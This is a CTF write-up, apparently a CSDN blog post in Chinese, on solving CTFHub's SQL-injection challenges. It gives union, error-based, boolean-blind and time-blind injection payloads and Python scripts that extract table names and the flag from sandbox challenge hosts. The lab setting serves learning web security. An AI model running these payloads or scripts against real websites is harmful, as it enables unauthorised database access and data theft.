2021-06-16ctfhub技能树SQL注入系列

最新推荐文章于 2024-04-02 22:15:00 发布
最新推荐文章于 2024-04-02 22:15:00 发布
阅读量314 收藏 1
点赞数
分类专栏: CTF
原文链接:https://blog.csdn.net/weixin_44037296/article/details/105073816
版权

CTFHub SQL技能树-整数形注入-字符型注入-报错注入-布尔盲注-时间盲注

整数型注入

在这里插入图片描述
首先输入1查看回显:
在这里插入图片描述
可以看到返回了SQL语句及IDData数据,查看列数:

1 order by 2 #

    
    
    
    
  • 1

在这里插入图片描述
当列数为2时回显正常,接着判断回显位:

1111 union select 11,22 #

    
    
    
    
  • 1

在这里插入图片描述
可以判断出回显点位如上,查看当前数据库版本及数据库名:

1111 union select version(),database() #

    
    
    
    
  • 1

在这里插入图片描述
查询到当前数据库名为:sqli,继续查询该数据库中的表名:

11111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

    
    
    
    
  • 1

在这里插入图片描述
通过group_concat()函数将所有的表查询出来,得到newsflag两个表,继续查询flag表中的列:

11111 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #

    
    
    
    
  • 1

在这里插入图片描述
查询到flag表中只有flag一列,查看flag列中的内容:

11111 union select 1,flag from sqli.flag #

    
    
    
    
  • 1

在这里插入图片描述
得到flag,完成了整形注入

字符型注入

在这里插入图片描述
首先尝试输入1查看回显:
在这里插入图片描述
可以看到返回了SQL语句及IDData数据,因已得知为字符型注入,其注入过程及语句与整形注入一致:

11111' union select 1,flag from sqli.flag #

    
    
    
    
  • 1

在这里插入图片描述
只是SQL语句闭合方式为id='1'具体参考整形注入

报错注入

在这里插入图片描述
先输入1查看回显:
在这里插入图片描述
当输入1'判断注入时,得到报错信息:
在这里插入图片描述
输入1 #验证:
在这里插入图片描述
可以判断出为整形的报错注入,查询数据库名:

1 Union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

    
    
    
    
  • 1

在这里插入图片描述
通过修改limit 0,1逐个查询表名:
在这里插入图片描述
在这里插入图片描述
查询出newsflag两个表,继续查询flag表中的列:

1 Union select count(*),concat((select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x

    
    
    
    
  • 1

在这里插入图片描述
得到列名为flag,查看列中的数据:

1 Union select count(*),concat((select flag from flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x

    
    
    
    
  • 1

在这里插入图片描述
得到flag,完成报错注入

布尔盲注

先输入1查看回显内容:
在这里插入图片描述
提示查询成功,但不会回显内容,只有查询语句语法错误是才显示error,尝试查询当前字段长度:

1 order by 2 #

    
    
    
    
  • 1

在这里插入图片描述
得出当前字段数为2,因为盲注需要猜解大量内容,使用脚本查询当前数据库名:

import requests
import string

url = ‘http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id=’
mark = ‘query_success’

def database_name():
name = ‘’
for i in range(1, 9):
for j in string.ascii_letters:
url_db = url + ‘if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))’ % (i, j)
r = requests.get(url_db)
if mark in r.text:
name += j
break
print(‘database_name:’, name)

database_name()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20

在这里插入图片描述
得到当前数据库名为:sqli,继续查询表名:

import requests
import string

url = ‘http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id=’
mark = ‘query_success’

def table_name():
list = []
for i in range(0, 4):
name = ‘’
for j in range(1, 9):
for k in string.ascii_letters:
url_t = url + ‘if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))’ % (i, j, k)
r = requests.get(url_t)
if mark in r.text:
name += k
break
list.append(name)
print(‘table_name:’, list)

table_name()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23

在这里插入图片描述
得到两个表名:newsflag,继续查询flag表中的列:

import requests
import string

url = ‘http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id=’
mark = ‘query_success’

def columns_name():
list = []
for i in range(0, 3):
name = ‘’
for j in range(1, 9):
for k in string.ascii_letters:
url_c = url + ‘if(substr((select column_name from information_schema.columns where table_name=“flag” and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))’ % (i, j, k)
r = requests.get(url_c)
if mark in r.text:
name += k
break
list.append(name)
print(‘column_name:’, list)

columns_name()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23

在这里插入图片描述
得到列名也为flag,查询其中内容:

import requests
import string

url = ‘http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id=’
mark = ‘query_success’

def data():
name = ‘’
for i in range(1, 50):
for j in range(48, 126):
url_d = url + ‘if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))’ % (i, j)
r = requests.get(url_d)
if mark in r.text:
name += chr(j)
break
print(‘data:’, name)

data()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20

得到flag
在这里插入图片描述
完成布尔注入

时间盲注

在这里插入图片描述
什么内容都不返回,尝试使用脚本进行时间盲注,首先获取数据库名:

import requests
import string
import time

url = ‘http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id=’

def database_name():
name = ‘’
for i in range(1, 9):
for j in string.ascii_letters:
url_db = url + ‘if(substr(database(),%d,1)="%s",sleep(3),1)’ % (i, j)
time_b = time.time()
r = requests.get(url_db)
time_f = time.time()
if time_f-time_b > 2:
name += j
break
print(‘database_name:’, name)

database_name()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22

在这里插入图片描述
得到数据库名为sqli,继续查询表名:

import requests
import string
import time

url = ‘http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id=’

def table_name():
list = []
for i in range(0, 2):
name = ‘’
for j in range(1, 9):
for k in string.ascii_letters:
url_t = url + ‘if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",sleep(3),1)’ % (i, j, k)
time_b = time.time()
r = requests.get(url_t)
time_f = time.time()
if time_f - time_b > 2:
name += k
break
list.append(name)
print(‘table_name:’, list)

table_name()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25

在这里插入图片描述

得到两个表名:newsflag,继续查询flag表中的列:

import requests
import string
import time

url = ‘http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id=’

def columns_name():
list = []
for i in range(0, 1):
name = ‘’
for j in range(1, 9):
for k in string.ascii_letters:
url_c = url + ‘if(substr((select column_name from information_schema.columns where table_name=“flag” limit %d,1),%d,1)="%s",sleep(3),1)’ % (i, j, k)
time_b = time.time()
r = requests.get(url_c)
time_f = time.time()
if time_f - time_b > 2:
name += k
break
list.append(name)
print(‘column_name:’, list)

columns_name()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25

在这里插入图片描述
得到列名也为flag,查询其中内容:

import requests
import string
import time

url = ‘http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id=’

def data():
name = ‘’
for i in range(1, 50):
for j in range(48, 126):
url_d = url + ‘if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)’ % (i, j)
r = requests.get(url_d)
time_b = time.time()
r = requests.get(url_d)
time_f = time.time()
if time_f-time_b > 2:
name += chr(j)
print(name)
break
print(‘data:’, name)

data()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24

得到flag

完成时间盲注

热热的雨夜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
CTFHUB|SQL注入(sqlmap)
m0_60651303的博客
07-14 1100
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTFHUB-SQL注入
m_de_g的博客
08-11 5396
** CTFHUB-SQL注入 ** 一、SQl注入的基础 1.介绍SQL注入 SQL注入就是指WEB应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来是实现对数据库的任意操作。 一般情况下,开发人员可以使用动态SQL语句创建通用、灵活的应用。动态SQL语句是在执行过程中构造的,他根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件选择不同
CTFHUB-技能树-Web题-SQL注入-布尔盲注
最新发布
Static______的博客
04-02 562
由于返回值是正确或错误,寻常and 后面布尔盲注语句不好使,因为它们是根据查询结果为空来判断。输入1 (也可输入1 and 1=1)返回 query_success。输入1’ (也可输入1 and 1=2)返回query_error。发现1 and length(database()) >=1 正确。1 and length(database()) >=5 错误。1 and length(database()) >=4正确。要一个一个判断有点难,可以用python脚本。这时候想到用if语句。
MySQL技能树学习总结
master_hunter的博客
10-10 2031
MySQL技能树还是做的很成功的,闲暇之余可以利用碎片化的时间来学习到一门不同的技术,而且带有笔记,若是以后支持在线编码出成果就再好不过了。总体而言体验感还是相当不错!
题解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2072
数据库注入
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 1845
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
2021-SQL开发及优化.ppt
09-01
2021-SQL开发及优化 2021-SQL开发及优化 2021-SQL开发及优化
2021-06-24-SQL SERVER 2019 安装需要的软件.zip
06-24
2021-06-24:SQL SERVER 2019 安装脚程(教程)(附带第一次使用事项):https://blog.csdn.net/qq_45913057/article/details/118187042
CTFhub 报错注入
plant1234的博客
06-16 216
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
CTFHUB技能树SQL注入
2401_82985722的博客
03-26 589
MySQL提供的 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。用group by(order by)判断查询列数,group by 2有回显 3无回显,证明字段数量为2列。修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22。2-1回显与1一样,判断为数字型注入(不用考虑闭合符合)爆出flag数据表中的全部字段名,得到完整flag。2-1的回显界面与1不一样,判断为字符型注入。输入1时正常回显,输入1'时报错。
ctfhub技能树web--sql注入
m0_64636395的博客
05-15 728
SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。提示:以下是本篇文章正文内容,下面案例可供参考。
CTFHub——技能树——SQL注入(sqlmap)
sparename的博客
12-26 6855
SQL注入整数型注入sqlmap简介检测注入实战解题字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入UA注入Refer注入过滤空格 整数型注入 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用u
CTFHub闯关之SQL注入
m0_60716947的博客
05-01 3358
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。 CTFHub 地址:CTFHub CTF.
CTF-SQL注入
weixin_44770698的博客
06-16 4945
CTF-SQL注入题目整理
CTFHub技能树 Web-SQL注入 详解
weixin_45808483的博客
11-16 3887
整数型注入 我们输入 1 不断尝试发现闭合方式就是 1 ,整数型 存在两列 order by 2 存在两个注入点 /?id=-1 union select 8,9 爆库,当前数据库为sqli /?id=-1 union select 8,database() 爆出所有表名,这里我们需要吧sqli转换为16进制 /?id=-1 union select 8,group_concat(table_name) from infromation_schema...
技能树一览
sinat_40898834的博客
04-26 1443
转 https://my.oschina.net/niejianbo/blog/761079
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值